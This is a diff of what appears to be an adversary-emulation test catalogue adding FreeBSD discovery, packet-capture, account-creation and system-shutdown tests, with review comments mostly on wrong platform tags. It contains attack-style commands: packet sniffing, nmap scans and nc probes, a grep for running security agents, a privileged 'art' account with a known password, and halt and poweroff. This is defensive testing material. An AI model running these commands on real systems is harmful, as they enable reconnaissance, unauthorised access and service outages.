|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
output_file:
|
||||
description: Path where captured results will be placed
|
||||
type: path
|
||||
default: "/tmp/T1087.001.txt"
|
||||
executor:
|
||||
command: |
|
||||
lastlogin > #{output_file}
|
||||
cat #{output_file}
|
||||
cleanup_command: 'rm -f #{output_file}
|
||||
|
||||
'
|
||||
name: sh
|
||||
- name: Enumerate users and groups
|
||||
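Review bot: `lastlogin` is a FreeBSD base utility, so `supported_platforms: - linux` is the wrong tag for the "(freebsd)" test; tag it `freebsd` so it is not scheduled on hosts where the command does not exist.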
@@ -64403,7 +66685,6 @@ discovery:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
@@ -64517,6 +66798,20 @@ discovery:
|
||||
command: |
|
||||
if (systemd-detect-virt) then echo "Virtualization Environment detected"; fi;
|
||||
if (sudo dmidecode | egrep -i 'manufacturer|product|vendor' | grep -iE 'Oracle|VirtualBox|VMWare|Parallels') then echo "Virtualization Environment detected"; fi;
|
||||
- name: Detect Virtualization Environment (FreeBSD)
|
||||
auto_generated_guid: e129d73b-3e03-4ae9-bf1e-67fc8921e0fd
|
||||
description: |
|
||||
Detects execution in a virtualized environment.
|
||||
At boot, dmesg stores a log if a hypervisor is detected.
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
command: 'if [ "$(sysctl -n hw.hv_vendor)" != "" ]; then echo "Virtualization
|
||||
Environment detected"; fi
|
||||
|
||||
'
|
||||
T1069.002:
|
||||
technique:
|
||||
modified: '2023-04-07T17:16:47.754Z'
|
||||
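Review bot: the description says the check relies on a `dmesg` log written at boot, but the command queries `sysctl -n hw.hv_vendor`; align the text with the command (or vice versa). `elevation_required: true` is not needed to read that sysctl, and the test is tagged `linux` although `hw.hv_vendor` is a FreeBSD sysctl name.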
@@ -64665,6 +66960,18 @@ discovery:
|
||||
|
||||
'
|
||||
name: bash
|
||||
- name: System Service Discovery - service
|
||||
auto_generated_guid: b2e1c734-7336-40f9-b970-b04731cbaf8a
|
||||
description: 'Enumerates system service using service
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
command: 'service -e
|
||||
|
||||
'
|
||||
name: sh
|
||||
T1040:
|
||||
technique:
|
||||
modified: '2023-04-12T23:31:49.085Z'
|
||||
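Review bot: `service -e` lists enabled rc.d services on FreeBSD, but `supported_platforms: - linux` will schedule it on Linux hosts where `service` takes different arguments; tag it `freebsd`. The description would read better as "Enumerates enabled system services using `service -e`".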
@@ -64782,6 +67089,117 @@ discovery:
|
||||
tshark -c 5 -i #{interface}
|
||||
name: bash
|
||||
elevation_required: true
|
||||
- name: Packet Capture FreeBSD using tshark or tcpdump
|
||||
auto_generated_guid: c93f2492-9ebe-44b5-8b45-36574cccfe67
|
||||
description: |
|
||||
Perform a PCAP. Wireshark will be required for tshark. TCPdump may already be installed.
|
||||
|
||||
Upon successful execution, tshark or tcpdump will execute and capture 5 packets on interface ens33.
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
interface:
|
||||
description: Specify interface to perform PCAP on.
|
||||
type: string
|
||||
default: em0
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'Check if at least one of tcpdump or tshark is installed.
|
||||
|
||||
'
|
||||
prereq_command: 'if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command
|
||||
-v tshark)" ]; then exit 1; else exit 0; fi;
|
||||
|
||||
'
|
||||
get_prereq_command: "(which pkg && pkg install -y wireshark-nox11)\n"
|
||||
executor:
|
||||
command: |
|
||||
tcpdump -c 5 -nnni #{interface}
|
||||
tshark -c 5 -i #{interface}
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Packet Capture FreeBSD using /dev/bpfN with sudo
|
||||
auto_generated_guid: e2028771-1bfb-48f5-b5e6-e50ee0942a14
|
||||
description: 'Opens a /dev/bpf file (O_RDONLY) and captures packets for a few
|
||||
seconds.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
ifname:
|
||||
description: Specify interface to perform PCAP on.
|
||||
type: string
|
||||
default: em0
|
||||
csource_path:
|
||||
description: Path to C program source
|
||||
type: string
|
||||
default: PathToAtomicsFolder/T1040/src/freebsd_pcapdemo.c
|
||||
program_path:
|
||||
description: Path to compiled C program
|
||||
type: string
|
||||
default: "/tmp/t1040_freebsd_pcapdemo"
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'compile C program
|
||||
|
||||
'
|
||||
prereq_command: 'exit 1
|
||||
|
||||
'
|
||||
get_prereq_command: 'cc #{csource_path} -o #{program_path}
|
||||
|
||||
'
|
||||
executor:
|
||||
command: 'sudo #{program_path} -i #{ifname} -t 3
|
||||
|
||||
'
|
||||
cleanup_command: 'rm -f #{program_path}
|
||||
|
||||
'
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Filtered Packet Capture FreeBSD using /dev/bpfN with sudo
|
||||
auto_generated_guid: a3a0d4c9-c068-4563-a08d-583bd05b884c
|
||||
description: 'Opens a /dev/bpf file (O_RDONLY), sets BPF filter for ''udp''
|
||||
and captures packets for a few seconds.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
ifname:
|
||||
description: Specify interface to perform PCAP on.
|
||||
type: string
|
||||
default: em0
|
||||
csource_path:
|
||||
description: Path to C program source
|
||||
type: string
|
||||
default: PathToAtomicsFolder/T1040/src/freebsd_pcapdemo.c
|
||||
program_path:
|
||||
description: Path to compiled C program
|
||||
type: string
|
||||
default: "/tmp/t1040_freebsd_pcapdemo"
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'compile C program
|
||||
|
||||
'
|
||||
prereq_command: 'exit 1
|
||||
|
||||
'
|
||||
get_prereq_command: 'cc #{csource_path} -o #{program_path}
|
||||
|
||||
'
|
||||
executor:
|
||||
command: 'sudo #{program_path} -f -i #{ifname} -t 3
|
||||
|
||||
'
|
||||
cleanup_command: 'rm -f #{program_path}
|
||||
|
||||
'
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo
|
||||
auto_generated_guid: 10c710c9-9104-4d5f-8829-5b65391e2a29
|
||||
description: 'Captures packets with domain=AF_PACKET, type=SOCK_RAW for a few
|
||||
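Review bot: this hunk repeats the same three FreeBSD capture tests (identical GUIDs) as the credential-access T1040 hunk earlier in the patch, so the same comments apply: `supported_platforms` should be `freebsd`, the `prereq_command: 'exit 1'` dependencies should test for the compiled binary, and the "interface ens33" wording does not match the `em0` default. If this index is generated from the per-technique YAML, fix the source atomic and regenerate rather than editing both copies by hand.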
@@ -65023,6 +67441,38 @@ discovery:
|
||||
'
|
||||
name: bash
|
||||
elevation_required: true
|
||||
- name: Network Share Discovery - FreeBSD
|
||||
auto_generated_guid: 77e468a6-3e5c-45a1-9948-c4b5603747cb
|
||||
description: 'Network Share Discovery using smbstatus
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
package_checker:
|
||||
description: Package checking command. pkg info -x samba
|
||||
type: string
|
||||
default: "(pkg info -x samba &>/dev/null)"
|
||||
package_installer:
|
||||
description: Package installer command. pkg install -y samba413
|
||||
type: string
|
||||
default: "(which pkg && pkg install -y samba413)"
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'Package with smbstatus (samba) must exist on device
|
||||
|
||||
'
|
||||
prereq_command: 'if #{package_checker} > /dev/null; then exit 0; else exit
|
||||
1; fi
|
||||
|
||||
'
|
||||
get_prereq_command: "#{package_installer} \n"
|
||||
executor:
|
||||
command: 'smbstatus --shares
|
||||
|
||||
'
|
||||
name: sh
|
||||
elevation_required: true
|
||||
T1120:
|
||||
technique:
|
||||
modified: '2023-03-30T21:01:41.575Z'
|
||||
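Review bot: the `package_checker` default `(pkg info -x samba &>/dev/null)` uses the bash-only `&>` redirection, but `dependency_executor_name` is `sh`; a POSIX sh parses `&>` as `&` followed by `>/dev/null`, so `pkg info` is backgrounded and `if #{package_checker} > /dev/null` always succeeds, skipping the installer even when samba is missing. Use `>/dev/null 2>&1`. The test is also tagged `linux` while installing with `pkg`.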
@@ -65162,7 +67612,6 @@ discovery:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -65217,13 +67666,24 @@ discovery:
|
||||
sudo lsmod | grep -i "virtio_pci\|virtio_net"
|
||||
sudo lsmod | grep -i "hv_vmbus\|hv_blkvsc\|hv_netvsc\|hv_utils\|hv_storvsc"
|
||||
name: bash
|
||||
- name: FreeBSD VM Check via Kernel Modules
|
||||
auto_generated_guid: eefe6a49-d88b-41d8-8fc2-b46822da90d3
|
||||
description: 'Identify virtual machine host kernel modules.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
command: |
|
||||
kldstat | grep -i "vmm"
|
||||
kldstat | grep -i "vbox"
|
||||
name: sh
|
||||
- name: Hostname Discovery
|
||||
auto_generated_guid: 486e88ea-4f56-470f-9b57-3f4d73f39133
|
||||
description: 'Identify system hostname for FreeBSD, Linux and macOS systems.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
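Review bot: the new "FreeBSD VM Check via Kernel Modules" test is tagged `supported_platforms: - linux` although `kldstat` is FreeBSD's module lister; tag it `freebsd`. Its description ("virtual machine host kernel modules") should also say whether it is meant to detect running on a hypervisor host or inside a guest, since `grep -i "vmm"` and `grep -i "vbox"` match different sides of that boundary.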
@@ -65238,9 +67698,8 @@ discovery:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
command: 'env
|
||||
|
||||
@@ -65261,6 +67720,20 @@ discovery:
|
||||
kmod list
|
||||
grep vmw /proc/modules
|
||||
name: sh
|
||||
- name: FreeBSD List Kernel Modules
|
||||
auto_generated_guid: 4947897f-643a-4b75-b3f5-bed6885749f6
|
||||
description: 'Enumerate kernel modules loaded. Upon successful execution stdout
|
||||
will display kernel modules loaded, followed by list of modules matching ''vmm''
|
||||
if present.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
command: |
|
||||
kldstat
|
||||
kldstat | grep vmm
|
||||
name: sh
|
||||
T1010:
|
||||
technique:
|
||||
modified: '2023-04-15T16:46:04.776Z'
|
||||
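Review bot: "FreeBSD List Kernel Modules" is tagged `supported_platforms: - linux`, so `kldstat` will be run on hosts that do not have it; tag it `freebsd`. The description promises "list of modules matching 'vmm' if present", which with `kldstat | grep vmm` produces an empty line and a non-zero grep status when nothing matches; that is fine, but worth stating.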
@@ -65679,7 +68152,6 @@ discovery:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
output_file:
|
||||
@@ -65692,6 +68164,28 @@ discovery:
|
||||
cat #{output_file} 2>/dev/null
|
||||
cleanup_command: 'rm -f #{output_file} 2>/dev/null
|
||||
|
||||
'
|
||||
name: sh
|
||||
- name: List Google Chromium Bookmark JSON Files on FreeBSD
|
||||
auto_generated_guid: 88ca025b-3040-44eb-9168-bd8af22b82fa
|
||||
description: 'Searches for Google Chromium''s Bookmark file (on FreeBSD) that
|
||||
contains bookmarks in JSON format and lists any found instances to a text
|
||||
file.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
output_file:
|
||||
description: Path where captured results will be placed.
|
||||
type: path
|
||||
default: "/tmp/T1217-Chrome.txt"
|
||||
executor:
|
||||
command: |
|
||||
find / -path "*/.config/chromium/*/Bookmarks" -exec echo {} >> #{output_file} \;
|
||||
cat #{output_file} 2>/dev/null
|
||||
cleanup_command: 'rm -f #{output_file} 2>/dev/null
|
||||
|
||||
'
|
||||
name: sh
|
||||
T1016:
|
||||
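Review bot: in `find / -path "*/.config/chromium/*/Bookmarks" -exec echo {} >> #{output_file} \;` the `>>` redirection applies to `find` itself, not to each `echo`, and permission-denied messages from `find` spill to the terminal; `find / -path "..." -print >> #{output_file} 2>/dev/null` is simpler and equivalent. The test is again tagged `linux` for a FreeBSD variant.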
@@ -65788,6 +68282,20 @@ discovery:
|
||||
if [ -x "$(command -v ip)" ]; then ip addr; else echo "ip is missing from the machine. skipping..."; fi;
|
||||
if [ -x "$(command -v netstat)" ]; then netstat -ant | awk '{print $NF}' | grep -v '[a-z]' | sort | uniq -c; else echo "netstat is missing from the machine. skipping..."; fi;
|
||||
name: sh
|
||||
- name: System Network Configuration Discovery (freebsd)
|
||||
auto_generated_guid: 7625b978-4efd-47de-8744-add270374bee
|
||||
description: |
|
||||
Identify network configuration information.
|
||||
|
||||
Upon successful execution, sh will spawn multiple commands and output will be via stdout.
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
command: |
|
||||
if [ -x "$(command -v arp)" ]; then arp -a; else echo "arp is missing from the machine. skipping..."; fi;
|
||||
if [ -x "$(command -v ifconfig)" ]; then ifconfig; else echo "ifconfig is missing from the machine. skipping..."; fi;
|
||||
if [ -x "$(command -v netstat)" ]; then netstat -Sp tcp | awk '{print $NF}' | grep -v '[[:lower:]]' | sort | uniq -c; else echo "netstat is missing from the machine. skipping..."; fi;
|
||||
name: sh
|
||||
T1087:
|
||||
technique:
|
||||
modified: '2023-04-15T17:24:23.029Z'
|
||||
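Review bot: `supported_platforms: - linux` on the "(freebsd)" variant means both the Linux and the FreeBSD versions of this discovery test are scheduled on Linux; tag this one `freebsd`. The `netstat -Sp tcp` line uses FreeBSD's `netstat` option syntax and will error on Linux net-tools.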
@@ -66006,9 +68514,8 @@ discovery:
|
||||
|
||||
https://perishablepress.com/list-files-folders-recursively-terminal/
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
output_file:
|
||||
description: Output file used to store the results.
|
||||
@@ -66034,9 +68541,8 @@ discovery:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
output_file:
|
||||
description: Output file used to store the results.
|
||||
@@ -66139,7 +68645,6 @@ discovery:
|
||||
|
||||
Upon successful execution, sh will execute `netstat` and `who -a`. Results will output via stdout.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
dependency_executor_name: sh
|
||||
@@ -66423,7 +68928,6 @@ discovery:
|
||||
|
||||
Upon successful execution, sh will execute ps and output to /tmp/loot.txt.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -66575,9 +69079,8 @@ discovery:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
command: |
|
||||
if [ -x "$(command -v dscacheutil)" ]; then dscacheutil -q group; else echo "dscacheutil is missing from the machine. skipping..."; fi;
|
||||
@@ -66670,6 +69173,18 @@ discovery:
|
||||
|
||||
'
|
||||
name: bash
|
||||
- name: Examine password complexity policy - FreeBSD
|
||||
auto_generated_guid: a7893624-a3d7-4aed-9676-80498f31820f
|
||||
description: 'Lists the password complexity policy to console on FreeBSD.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
command: 'cat /etc/pam.d/passwd
|
||||
|
||||
'
|
||||
name: sh
|
||||
- name: Examine password complexity policy - CentOS/RHEL 7.x
|
||||
auto_generated_guid: 78a12e65-efff-4617-bc01-88f17d71315d
|
||||
description: 'Lists the password complexity policy to console on CentOS/RHEL
|
||||
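Review bot: `cat /etc/pam.d/passwd` only reveals a complexity policy on FreeBSD when a module such as `pam_passwdqc` is configured in that stack; the description should say that a default stack means the policy lives elsewhere (for example `/etc/login.conf`). The platform tag should be `freebsd`, not `linux`.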
@@ -66819,7 +69334,6 @@ discovery:
|
||||
Upon successful execution, the output will contain the environment variables that indicate
|
||||
the 5 character locale that can be looked up to correlate the language and territory.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: 'locale
|
||||
@@ -66877,7 +69391,6 @@ discovery:
|
||||
also used as a builtin command that does not generate syscall telemetry but
|
||||
does provide a list of the environment variables.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
@@ -67092,6 +69605,18 @@ discovery:
|
||||
executor:
|
||||
command: 'ps aux | egrep ''falcond|nessusd|cbagentd|td-agent|packetbeat|filebeat|auditbeat|osqueryd''
|
||||
|
||||
'
|
||||
name: sh
|
||||
- name: Security Software Discovery - pgrep (FreeBSD)
|
||||
auto_generated_guid: fa96c21c-5fd6-4428-aa28-51a2fbecdbdc
|
||||
description: |
|
||||
Methods to identify Security Software on an endpoint
|
||||
when sucessfully executed, command shell is going to display AV/Security software it is running.
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
command: 'pgrep -l ''bareos-fd|icinga2|cbagentd|wazuh-agent|packetbeat|filebeat|osqueryd''
|
||||
|
||||
'
|
||||
name: sh
|
||||
T1526:
|
||||
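Review bot: description typo ("sucessfully"), and `supported_platforms: - linux` again on a test named "(FreeBSD)". The `pgrep -l 'bareos-fd|icinga2|...'` pattern is fine as an extended regex.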
@@ -67242,7 +69767,6 @@ discovery:
|
||||
|
||||
Upon successful execution, sh will execute arp to list out the arp cache. Output will be via stdout.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
dependency_executor_name: sh
|
||||
@@ -67268,7 +69792,6 @@ discovery:
|
||||
|
||||
Upon successful execution, sh will perform a ping sweep on the 192.168.1.1/24 and echo via stdout if an IP is active.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -67332,6 +69855,18 @@ discovery:
|
||||
executor:
|
||||
command: 'ip route show
|
||||
|
||||
'
|
||||
name: sh
|
||||
- name: Remote System Discovery - netstat
|
||||
auto_generated_guid: d2791d72-b67f-4615-814f-ec824a91f514
|
||||
description: 'Use the netstat command to display the kernels routing tables.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
command: 'netstat -r | grep default
|
||||
|
||||
'
|
||||
name: sh
|
||||
- name: Remote System Discovery - ip tcp_metrics
|
||||
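Review bot: the description should read "the kernel's routing tables". Unlike its siblings in this patch, "Remote System Discovery - netstat" carries no FreeBSD suffix or wording, so clarify whether it is meant to be cross-platform (in which case `linux` is a reasonable tag, and `macos` could be added) or FreeBSD-only like the other additions.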
@@ -67504,6 +70039,44 @@ discovery:
|
||||
nc -nv #{host} #{port}
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Port Scan Nmap for FreeBSD
|
||||
auto_generated_guid: f03d59dc-0e3b-428a-baeb-3499552c7048
|
||||
description: |
|
||||
Scan ports to check for listening ports with Nmap.
|
||||
|
||||
Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of addresses on port 80 to determine if listening. Results will be via stdout.
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
host:
|
||||
description: Host to scan.
|
||||
type: string
|
||||
default: 192.168.1.1
|
||||
port:
|
||||
description: Ports to scan.
|
||||
type: string
|
||||
default: '80'
|
||||
network_range:
|
||||
description: Network Range to Scan.
|
||||
type: string
|
||||
default: 192.168.1.0/24
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'Check if nmap command exists on the machine
|
||||
|
||||
'
|
||||
prereq_command: 'if [ -x "$(command -v nmap)" ]; then exit 0; else exit 1;
|
||||
fi;
|
||||
|
||||
'
|
||||
get_prereq_command: "(which pkg && pkg install -y nmap)\n"
|
||||
executor:
|
||||
command: |
|
||||
nmap -sS #{network_range} -p #{port}
|
||||
telnet #{host} #{port}
|
||||
nc -nv #{host} #{port}
|
||||
name: sh
|
||||
elevation_required: true
|
||||
T1518:
|
||||
technique:
|
||||
modified: '2023-03-30T21:01:50.920Z'
|
||||
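Review bot: `supported_platforms` for "Port Scan Nmap for FreeBSD" lists only `- linux`, while the test name and the `get_prereq_command: "(which pkg && pkg install -y nmap)\n"` are FreeBSD-specific; add `- freebsd` (or replace `- linux`) so the platform list matches where `pkg` exists. The prereq also checks only `command -v nmap`, but the executor runs `telnet #{host} #{port}` and `nc -nv #{host} #{port}` as well; extend the dependency check to all three binaries so the test fails its prereq instead of failing mid-run.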
@@ -67747,7 +70320,19 @@ discovery:
|
||||
x_mitre_attack_spec_version: 3.1.0
|
||||
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||||
identifier: T1124
|
||||
atomic_tests: []
|
||||
atomic_tests:
|
||||
- name: System Time Discovery in FreeBSD/macOS
|
||||
auto_generated_guid: f449c933-0891-407f-821e-7916a21a1a6f
|
||||
description: "Identify system time. Upon execution, the local computer system
|
||||
time and timezone will be displayed. \n"
|
||||
supported_platforms:
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
command: 'date
|
||||
|
||||
'
|
||||
name: sh
|
||||
resource-development:
|
||||
T1583:
|
||||
technique:
|
||||
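Review bot: "System Time Discovery in FreeBSD/macOS" declares `supported_platforms` as `- linux` and `- macos` with no `- freebsd`, so the platform list contradicts the test name; add `- freebsd`. The hunk also shows both `atomic_tests: []` and `atomic_tests:` under `identifier: T1124`; the header (7 lines to 19) implies the empty list is the removed line, so confirm the merged file carries only the populated key, since a repeated mapping key is invalid YAML.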
@@ -73810,7 +76395,6 @@ impact:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
pwd_for_encrypted_file:
|
||||
@@ -73856,7 +76440,6 @@ impact:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
pwd_for_encrypted_file:
|
||||
@@ -73895,7 +76478,6 @@ impact:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
cped_file_path:
|
||||
@@ -73946,7 +76528,6 @@ impact:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
private_key_path:
|
||||
@@ -74364,9 +76945,8 @@ impact:
|
||||
This test simulates a high CPU load as you might observe during cryptojacking attacks.
|
||||
End the test by using CTRL/CMD+C to break.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
command: 'yes > /dev/null
|
||||
|
||||
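Review bot: the `supported_platforms` block in this hunk shows `- macos` twice, once before `- linux` and once after it, and the header (9 lines to 8) says the net change is one line removed, so the rendered view has dropped the +/- markers; confirm the merged list is `- freebsd`, `- linux`, `- macos` with a single `macos` entry. The same four-entry shape recurs in the later `supported_platforms` hunks on this page (`-74928`, `-74948`, `-74968`, and the `defense-evasion`, `privilege-escalation`, `execution`, `persistence`, `command-and-control`, `collection`, `credential-access` and `discovery` hunks with 9-to-8 headers) and deserves the same check.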
@@ -74529,7 +77109,6 @@ impact:
|
||||
Overwrites and deletes a file using DD.
|
||||
To stop the test, break the command with CTRL/CMD+C.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -74928,9 +77507,8 @@ impact:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
timeout:
|
||||
description: Time to restart (can be minutes or specific time)
|
||||
@@ -74948,9 +77526,8 @@ impact:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
timeout:
|
||||
description: Time to shutdown (can be minutes or specific time)
|
||||
@@ -74968,9 +77545,8 @@ impact:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
command: 'reboot
|
||||
|
||||
@@ -74983,7 +77559,6 @@ impact:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: 'halt -p
|
||||
@@ -74991,6 +77566,19 @@ impact:
|
||||
'
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Reboot System via `halt` - FreeBSD
|
||||
auto_generated_guid: 7b1cee42-320f-4890-b056-d65c8b884ba5
|
||||
description: 'This test restarts a FreeBSD system using `halt`.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
command: 'halt -r
|
||||
|
||||
'
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Reboot System via `halt` - Linux
|
||||
auto_generated_guid: 78f92e14-f1e9-4446-b3e9-f1b921f2459e
|
||||
description: 'This test restarts a Linux system using `halt`.
|
||||
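Review bot: "Reboot System via `halt` - FreeBSD" declares `supported_platforms` as `- linux` only; the name says FreeBSD, and the next test in the same hunk, "Reboot System via `halt` - Linux", already covers Linux, so this entry should list `- freebsd` instead. Since the two tests differ only in name and flag, the platform lists are the only thing that keeps them from running twice on the same host.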
@@ -75010,7 +77598,6 @@ impact:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: 'poweroff
|
||||
@@ -75018,6 +77605,19 @@ impact:
|
||||
'
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Reboot System via `poweroff` - FreeBSD
|
||||
auto_generated_guid: 5a282e50-86ff-438d-8cef-8ae01c9e62e1
|
||||
description: 'This test restarts a FreeBSD system using `poweroff`.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
command: 'poweroff -r 3
|
||||
|
||||
'
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Reboot System via `poweroff` - Linux
|
||||
auto_generated_guid: 61303105-ff60-427b-999e-efb90b314e41
|
||||
description: 'This test restarts a Linux system using `poweroff`.
|
||||
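Review bot: "Reboot System via `poweroff` - FreeBSD" has the same platform mismatch as the `halt` test above: `supported_platforms` lists `- linux` while the name says FreeBSD and a separate "- Linux" variant follows in the hunk; change it to `- freebsd`. The executor `poweroff -r 3` also carries a trailing `3` that the description ("restarts a FreeBSD system using `poweroff`") does not explain; document what it does or drop it.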
@@ -76619,6 +79219,23 @@ initial-access:
|
||||
whoami
|
||||
exit
|
||||
cleanup_command: "userdel -r art \n"
|
||||
- name: Create local account (FreeBSD)
|
||||
auto_generated_guid: 95158cc9-8f6d-4889-9531-9be3f7f095e0
|
||||
description: 'An adversary may wish to create an account with admin privileges
|
||||
to work with. In this test we create a "art" user with the password art, switch
|
||||
to art, execute whoami, exit and delete the art user.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
command: "pw useradd art -g wheel -s /bin/sh\necho $(openssl passwd -1 art)
|
||||
| pw mod user testuser1 -h 0 \nsu art\nwhoami\nexit\n"
|
||||
cleanup_command: 'rmuser -y art
|
||||
|
||||
'
|
||||
- name: Reactivate a locked/expired account (Linux)
|
||||
auto_generated_guid: d2b95631-62d7-45a3-aaef-0972cea97931
|
||||
description: "A system administrator may have locked and expired a user account
|
||||
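Review bot: in "Create local account (FreeBSD)" the password is set on the wrong account: the command runs `pw useradd art -g wheel -s /bin/sh` and then `echo $(openssl passwd -1 art) | pw mod user testuser1 -h 0`, so the `art` user never receives the password and `pw` will fail because `testuser1` does not exist; change it to `pw mod user art -h 0`. The test also uses `pw` and `rmuser`, which are FreeBSD tools, yet `supported_platforms` lists only `- linux`; it should be `- freebsd`.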
@@ -76642,6 +79259,30 @@ initial-access:
|
||||
whoami
|
||||
exit
|
||||
cleanup_command: "userdel -r art \n"
|
||||
- name: Reactivate a locked/expired account (FreeBSD)
|
||||
auto_generated_guid: '09e3380a-fae5-4255-8b19-9950be0252cf'
|
||||
description: "A system administrator may have locked and expired a user account
|
||||
rather than deleting it. \"the user is coming back, at some stage\" An adversary
|
||||
may reactivate a inactive account in an attempt to appear legitimate. \n\nIn
|
||||
this test we create a \"art\" user with the password art, lock and expire
|
||||
the account, try to su to art and fail, unlock and renew the account, su successfully,
|
||||
then delete the account.\n"
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
command: |
|
||||
pw useradd art -g wheel -s /bin/sh
|
||||
echo $(openssl passwd -1 art) | pw mod user testuser1 -h 0
|
||||
pw lock art
|
||||
pw usermod art -e +1d
|
||||
pw unlock art
|
||||
pw user mod art -e +99d
|
||||
su art
|
||||
whoami
|
||||
exit
|
||||
cleanup_command: "rmuser -y art \n"
|
||||
- name: Login as nobody (Linux)
|
||||
auto_generated_guid: 3d2cd093-ee05-41bd-a802-59ee5c301b85
|
||||
description: 'An adversary may try to re-purpose a system account to appear
|
||||
